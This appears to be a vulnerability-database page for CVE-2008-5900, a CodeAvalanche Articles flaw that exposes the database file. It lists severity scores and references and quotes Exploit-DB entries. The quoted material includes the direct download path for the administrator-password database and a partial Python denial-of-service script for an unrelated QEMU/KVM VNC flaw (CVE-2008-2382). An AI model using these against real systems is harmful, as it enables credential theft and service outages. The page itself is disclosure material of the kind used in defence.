CVE-2008-5900
Published 2009-01-12
Priority P350 · high · 7.5 (CVSS 2.0)
CVSS vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 6.36% (92.8th percentile)
CodeAvalanche Articles stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file containing the administrator password via a direct request for _private/CAArticles.mdb. NOTE: some of these details are obtained from third party information.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| codeavalanche | articles | — | — |
No detection rules found.
Exploit-DB
QEMU 0.9 / KVM 36/79 - VNC Server Remote Denial of Service
exploitdb·2008-12-22
CVE-2008-2382 QEMU 0.9 / KVM 36/79 - VNC Server Remote Denial of Service
---
source: https://www.securityfocus.com/bid/32910/info
QEMU and KVM are prone to a remote denial-of-service vulnerability that affects the included VNC server.
Attackers can exploit this issue to create a denial-of-service condition.
The following are vulnerable:
QEMU 0.9.1 and prior
KVM-79 and prior
##
## vnc remote DoS
##
import socket
import time
import struct
import sys
if len(sys.argv) < 3:
    print "Usage: %s host port" % sys.argv[0]
    exit(0)
host = sys.argv[1] # "127.0.0.1" # debian 4
port = int(sys.argv[2]) # 5900
s =socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((host,port))
# rec-send versions
srvversion = s.recv(100)
cliversion=srvversion
s.send(cliversion)
print "Server version: %s" % srvversion
#Sec
Exploit-DB
CodeAvalanche Articles - Database Disclosure
exploitdb·2008-12-15
CVE-2008-5900 CodeAvalanche Articles - Database Disclosure
---
#########################################################
Portal Name: CAArticles
Download : http://www.truecontent.info/codeavalanche/asp-articles-publishing-script.php
Author : Pouya_Server , [email protected]
Vulnerability : (DD)
#########################################################
[DD]:
http://site.com/[Path]/CAArticles/_private/CAArticles.mdb
# milw0rm.com [2008-12-15]
No writeups or analysis indexed.
http://secunia.com/advisories/33100
http://securityreason.com/securityalert/4909
https://exchange.xforce.ibmcloud.com/vulnerabilities/47351
https://www.exploit-db.com/exploits/7471
Published: 2009-01-12